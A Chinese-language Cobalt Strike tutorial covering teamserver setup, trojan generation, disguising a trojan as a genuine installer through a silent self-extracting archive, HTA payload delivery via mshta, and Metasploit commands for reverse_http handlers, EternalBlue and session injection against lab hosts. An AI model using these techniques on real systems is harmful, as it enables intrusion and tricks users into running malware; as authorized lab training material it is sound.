目录
CobaltStrike简介
主要功能:
使用注意: 在使用CobaltStrike进行渗透测试时,务必遵守法律法规,并获得合法授权。
CobaltStrike安装
前提
安装
服务端安装
windows安装
CS基本使用
监听器配置
一些基本的攻击
生成木马,靶机上线(此次演示木马生成在自己的电脑上,然后双击启动木马)
编辑
木马的伪装(自解压安装包设置)
生成hta文件,靶机上线
CS和MSF联动
CS会话传递到MSF上
设置外部监听器
配置msf,msf运行之后会获取会话
设置监听转移,选择外部监听器
结果
msf会话传递至CS上
首先先利用msf上线一台靶机
cs设置监听
msf设置派生
结果
CobaltStrike简介
CobaltStrike(简称CS)是一款专业的团队作战渗透测试工具,包含客户端和服务端两个部分。以下是关于CobaltStrike的简单介绍:
主要功能:
持久化、横向移动:在已经取得攻击目标控制权后,CobaltStrike能够用于在目标系统中保持长期存在,并进行横向移动,扩大攻击范围。
流量隐藏:通过其独特的技术手段,CobaltStrike可以有效地隐藏网络流量,使攻击行为难以被检测和追踪。
数据窃取:CobaltStrike还具备数据窃取能力,能够从目标系统中提取敏感信息。
使用注意:
在使用CobaltStrike进行渗透测试时,务必遵守法律法规,并获得合法授权。
CobaltStrike安装
前提
在安装CobaltStrike时,设备上需要部署jdk8以上的环境
安装
服务端安装在kali或者云服务器上,客户端安装在Windows上
服务端安装
(下列演示为在kali中安装)
将CobaltStrike安装包中服务端拖进kali中
在kali桌面文件夹中找到CobaltStrike(以下统称CS)找到teamserver文件,修改文件权限为文件添加执行权限
chmod +x teamserver
执行该文件
./teamserver 本机ip地址 自己设置的密码
后面会出现如下图所示界面
windows安装
打开CS的客户端,点击如下图框起来的地方
开始会有如下弹窗
之后会有如下弹窗,下列弹窗中Host填写Server端 IP地址,Port设置为服务端设置端口,Password设置服务端中设置密码,User自己随意设置,然后点击连接
然后就会出现如下图所示图片
这样就安装成功了
CS基本使用
监听器配置
在CS客户端中点击如下图所示图案
添加会话
一些基本的攻击
生成木马,靶机上线(此次演示木马生成在自己的电脑上,然后双击启动木马)
(木马也可以配合钓鱼攻击生成连接诱导被攻击点击)
选择创建位置
测试是否成功(下列图片测试成功的图片,可以打开机器的文件目录并且对其进行操作)
木马的伪装(自解压安装包设置)
选择一个木马程序和一个常用的软件,使用winrar软件进行压缩,选择自解压压缩格式选择的这个格式可以让后缀变为exe
点击高级,选择自解压选项
选择解压路径,是一个别人都能访问的路径 ,windows所有人都有的路径就是C:UsersPublic
按照下图设置解压方式
选择解压方式,静默解压
选择更新模式和覆盖模式
设置图标
然后点击确定就可以了,然后再修改一下文件名称,他会生成一个如下图所示文件(上面的是正版,下面的是盗版。是不是很像)
上述步骤出来的自解压安装包是会被杀毒软件发现的。如果上述安装包再配合一些其他黑客技术就可以进行一些。。。
生成hta文件,靶机上线
点击生成hta文件
设置监听和脚本语言
设置监听端口
设置监听端口,和hta文件
设置完成后会给你一串网址
复制地址在靶机上使用mshta进行运行
靶机上线成功
上线之后就可以提权进行下一步渗透了
CS和MSF联动
CS会话传递到MSF上
设置外部监听器
配置msf,msf运行之后会获取会话
msf6 > use exploit/multi/handler
#下面代码与你在CS中配置有关
#payload对应外部监听的payload,lhost配置的是本地地址,lpost要和监听器相同
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.244.141
msf6 exploit(multi/handler) > set lport 8085
设置监听转移,选择外部监听器
结果
会话成功转移到了msf上
msf会话传递至CS上
首先先利用msf上线一台靶机
这里用的是永恒之蓝漏洞上线的一台windows7靶机
msf6 > use exploit/windows/smb/ms17_010_eternalblue
#设置攻击主机
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.244.146
#设置监听端口
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 8081
#攻击
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
cs设置监听
msf设置派生
在MSF中,exploit/windows/local/payload_inject
模块通常用于在已经获得Windows系统shell访问权限的情况下,向该系统的另一个进程注入一个payload。
#使用该模块可以将 Metasploit 获取到的会话注入到CS中
use exploit/windows/local/payload_inject
#和cs监听器保持一致
set payload windows/meterpreter/reverse_http
#可以不设置,但是端口不要和CS冲突了。
set prependmigrate true
# msf所在主机IP
set lhost xxxx
#CS上的listen端口
set lport XXX
#要转发的session
set session 2
run
结果
会话已被cs获取